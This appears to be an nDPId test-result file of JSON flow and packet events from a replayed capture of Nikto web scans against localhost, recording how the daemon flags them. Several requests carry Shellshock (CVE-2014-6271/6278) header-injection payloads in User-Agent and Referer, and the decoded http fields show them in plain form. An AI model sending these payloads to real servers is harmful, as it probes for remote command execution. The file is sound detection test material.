{"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1576420277355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277355,"pkt":"AAAAAAAAAAAAAAAACABFAADBHndAAEAGHb5\/AAABfwAAAcTqH5Ag4SbPDIJk5IAYAED+tQAAAQEICp1m\/ZOdZv2TR0VUIC9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1576420277357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277357,"pkt":"AAAAAAAAAAAAAAAACABFAADKgAdAAEAGvCR\/AAABfwAAAcTsH5DBK7i\/eaGnm4AYAED+vgAAAQEICp1m\/ZWdZv2UR0VUIC9mYXZpY29ucy9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1576420277358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277358,"pkt":"AAAAAAAAAAAAAAAACABFAADByl9AAEAGcdV\/AAABfwAAAcTuH5C2YPLn77QmvYAYAED+tQAAAQEICp1m\/ZadZv2WR0VUIC9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1576420277359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277359,"pkt":"AAAAAAAAAAAAAAAACABFAADK7Z9AAEAGTox\/AAABfwAAAcTwH5DcrNUiTS0awIAYAED+vgAAAQEICp1m\/ZedZv2XR0VUIC9mYXZpY29ucy9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCg0K"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1576420277361,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420277361,"pkt":"AAAAAAAAAAAAAAAACABFAAC2klBAAEAGqe9\/AAABfwAAAcTyH5D2pKrzJKNAbIAYAED+qgAAAQEICp1m\/ZmdZv2ZR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1576420277375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277375,"pkt":"AAAAAAAAAAAAAAAACABFAAEBYRtAAEAG2tl\/AAABfwAAAcUGH5Bwr1nakn6kY4AYAED+9QAAAQEICp1m\/aedZv2nR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1576420277378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277378,"pkt":"AAAAAAAAAAAAAAAACABFAAEBjFVAAEAGr59\/AAABfwAAAcUIH5BgqrSU8g64oYAYAED+9QAAAQEICp1m\/aqdZv2qR0VUIC8gSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1576420277381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277381,"pkt":"AAAAAAAAAAAAAAAACABFAAEKrtxAAEAGjQ9\/AAABfwAAAcUKH5Ddg5Yc5mMQaoAYAED+\/gAAAQEICp1m\/a2dZv2sR0VUIC9hZG1pbi5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1576420277383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277383,"pkt":"AAAAAAAAAAAAAAAACABFAAES8w1AAEAGSNZ\/AAABfwAAAcUMH5A5v8vLlyOw2IAYAED\/BgAAAQEICp1m\/a+dZv2vR0VUIC9hZG1pbmlzdHJhdG9yLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} +01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1576420277386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277386,"pkt":"AAAAAAAAAAAAAAAACABFAAEO1qdAAEAGZUB\/AAABfwAAAcUOH5C5aO5oSApQ3oAYAED\/AgAAAQEICp1m\/bKdZv2yR0VUIC9hdXRoTG9naW4uY2dpIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 